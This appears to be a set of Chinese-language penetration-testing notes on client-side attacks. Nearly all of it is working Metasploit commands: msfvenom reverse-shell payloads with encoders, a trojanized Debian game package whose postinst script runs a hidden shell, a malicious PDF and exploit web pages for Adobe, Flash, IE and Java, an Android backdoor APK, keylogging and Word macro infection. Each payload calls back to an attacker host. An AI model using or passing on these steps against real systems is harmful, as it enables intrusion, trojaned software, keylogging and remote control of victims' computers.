1. 简介
-
在无法突破网络边界的情况下转而攻击客户端
- 社会工程学攻击
- 进而渗透线上业务网络
-
含有漏洞利用代码的 web 站点
- 利用客户端漏洞
-
含有漏洞利用代码的 doc、pdf等文档
- 诱骗被害者执行 payload
2. 攻击 windows
-
诱骗被害者执行 payload (windows)
- msfvenom –payload-options -p windows/shell/reverse_tcp
-
msfvenom -a x86 –platform windows -p windows/shell/reverse_tcp LHOST=10.10.10.131 LPORT=4444 -b “\x00” -e x86/shikata_ga_nai -f exe -o 1.exe
root@kali:~# msfvenom --payload-options -p windows/shell/reverse_tcp root@kali:~# msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=10.10.10.147 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -f exe -o 1.exe # 将文件拷贝到 winxp 主机
-
msfconsole
- use exploit/multi/handler
- set payload windows/shell/reverse_tcp
- set LHOST 10.10.10.131
- set LPORT 4444
- exploit
-
客户端执行文件
msf exploit(multi/handler) > set payload windows/shell/reverse_tcp msf exploit(multi/handler) > set LHOST 10.10.10.131 msf exploit(multi/handler) > set LPORT 4444 msf exploit(multi/handler) > exploit
3. 攻击 linux
- 诱骗被害者执行 payload (linux deb 安装包)
- cd /var/cache/apt/archives
- dpkg -x freesweep_0.90-3+b1_amd64.deb
- mkdir free/DEBIAN && cd free/DEBIAN
-
vi control
Package: freesweep Version: 0.90-3 Section: Games and Amusement Priority: optional Architecture:i386_64 Maintainer: Ubuntu MOTU Developers (ubuntu-motu@ lists.ubuntu.com) Description: a text-based minesweeper Freesweep isan implementation of the popular minesweeper game,whereone tries to find all the mines without igniting any, based on hints givenby the computer.Unlike most implementations of this game,Freesweepworksinanyvisualtextdispl in Linuxconsole,inanxterm,and inmost text-based terminals currently in use. -
vim postinst
#!/bin/sh sudo chmod 2755 /usr/games/freesweep_scores && /usr/games/freesweep_scores & /usr/games/freesweep & -
msfvenom -a x86 –platform linux -p linux/x86/shell/reverse_tcp LHOST=1.1.1.1 LPORT=4444 -b “\x00” -f elf -o /root/free/usr/games/freesweep_scores
- chmod 755 postinst
-
dpkg-deb –build /root/free
root@kali:~# apt-get --download-only install freesweep root@kali:~# cd /var/cache/apt/archives/ root@kali:~# cp freesweep_0.90-3+b1_amd64.deb ~ root@kali:~# cd root@kali:~# dpkg -x freesweep_0.90-3+b1_amd64.deb free root@kali:~# cd free root@kali:~/free# mkdir debian root@kali:~/free# cd DEBIAN/ root@kali:~/free/DEBIAN# vim control Package: freesweep Version: 0.90-3 Section: Games and Amusement Priority: optional Architecture:amd64 Maintainer: Ubuntu MOTU Developers (ubuntu-motu@ lists.ubuntu.com) Description: a text-based minesweeper Freesweep isan implementation of the popular minesweeper game,whereone tries to find all the mines without igniting any, based on hints givenby the computer.Unlike most implementations of this game,Freesweepworksinanyvisualtextdispl in Linuxconsole,inanxterm,and inmost text-based terminals currently in use. root@kali:~/free/DEBIAN# vim postinst #!/bin/sh sudo chmod 2755 /usr/games/freesweep_scores && /usr/games/freesweep_scores & /usr/games/freesweep & root@kali:~/free# chmod 755 postinst # 生成 payload root@kali:~/free/DEBIANn# msfvenom -a x86 --platform linux -p linux/x86/shell/reverse_tcp LHOST=10.10.10.131 LPORT=4444 -b "\x00" -f elf -o /root/free/usr/games/freesweep_scores root@kali:~/free/DEBIAN# dpkg-deb --build /root/free # 受害者机器安装此软件 root@lamp:/home/kevin/Desktop# dpkg -i free.deb
4. 利用 Acrobat Reader 漏洞执行 payload
-
构造 pdf 文件:use exploit/windows/fileformat/adobe_utilprintf
# 构造 pdf 文件 use exploit/windows/fileformat/adobe_utilprintf set payload windows/meterpreter/reverse_tcp msf exploit(windows/fileformat/adobe_utilprintf) > run [+] msf.pdf stored at /root/.msf4/local/msf.pdf # 开启监听 use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 10.10.10.131 exploit -
构造恶意网站:use exploit/windows/browser/adobe_utilprintf
use exploit/windows/browser/adobe_utilprintf set SRVPORT 80 set URIPATH / set payload windows/meterpreter/reverse_tcp set LHOST 10.10.10.131 exploit -
Meterpreter
- use priv
- run post/windows/capture/keylog_recorder
5. 利用 flash 插件漏洞执行 paylaod
-
use exploit/multi/browser/adobe_flash_hacking_team_uaf
use exploit/multi/browser/adobe_flash_hacking_team_uaf set SRVPORT 80 set URIPATH / set payload windows/meterpreter/reverse_tcp set LHOST 10.10.10.131 exploit -
use exploit/multi/browser/adobe_flash_opaque_background_uaf
use exploit/multi/browser/adobe_flash_opaque_background_uaf set SRVPORT 80 set URIPATH / set payload windows/meterpreter/reverse_tcp set LHOST 10.10.10.131 exploit -
use auxiliary/server/browser_autopwn2
use auxiliary/server/browser_autopwn2 set SRVPORT 80 set URIPATH / exploit
6. 利用 IE 浏览器漏洞执行 payload
-
use exploit/windows/browser/ms14_064_ole_code_execution
use exploit/windows/browser/ms14_064_ole_code_execution set SRVPORT 80 set URIPATH / set payload windows/meterpreter/reverse_tcp set LHOST 10.10.10.131 exploit
7. 利用 JRE 漏洞执行 payload
-
use exploit/multi/browser/java_jre17_driver_manager
use exploit/multi/browser/java_jre17_driver_manager set SRVPORT 80 set SRVHOST 10.10.10.131 set URIPATH / set payload java/meterpreter/reverse_tcp set LHOST 10.10.10.131 exploit -
use exploit/multi/browser/java_jre17_jmxbean
use exploit/multi/browser/java_jre17_jmxbean set SRVPORT 80 set SRVHOST 10.10.10.131 set URIPATH / set payload java/meterpreter/reverse_tcp set LHOST 10.10.10.131 exploit -
use exploit/multi/browser/java_jre17_reflection_types
use exploit/multi/browser/java_jre17_reflection_types set SRVPORT 80 set SRVHOST 10.10.10.131 set URIPATH / set payload java/meterpreter/reverse_tcp set LHOST 10.10.10.131 exploit
8. 生成 android 后门程序
- use payload/android/meterpreter/reverse_tcp
- generate -f a.apk -p android -t raw
9. 宏感染
- 利用宏感染 word、except 文档
- 绕过某些基于文件类型检查的安全机制
-
生成 vbscript 脚本:msfvenom -a x86 –platform windows -p windows/meterpreter/reverse_tcp LHOST=10.10.10.131 LPORT=4444 -e x86/shikata_ga_nai -f vba-exe
-
office 2007 +
- payload 第一部分粘入 VBA 代码
-
payload 第二部分粘入 word 正文
-
msf 启动侦听
- use exploit/multi/handler
- set payload windows/meterpreter/reverse_tcp
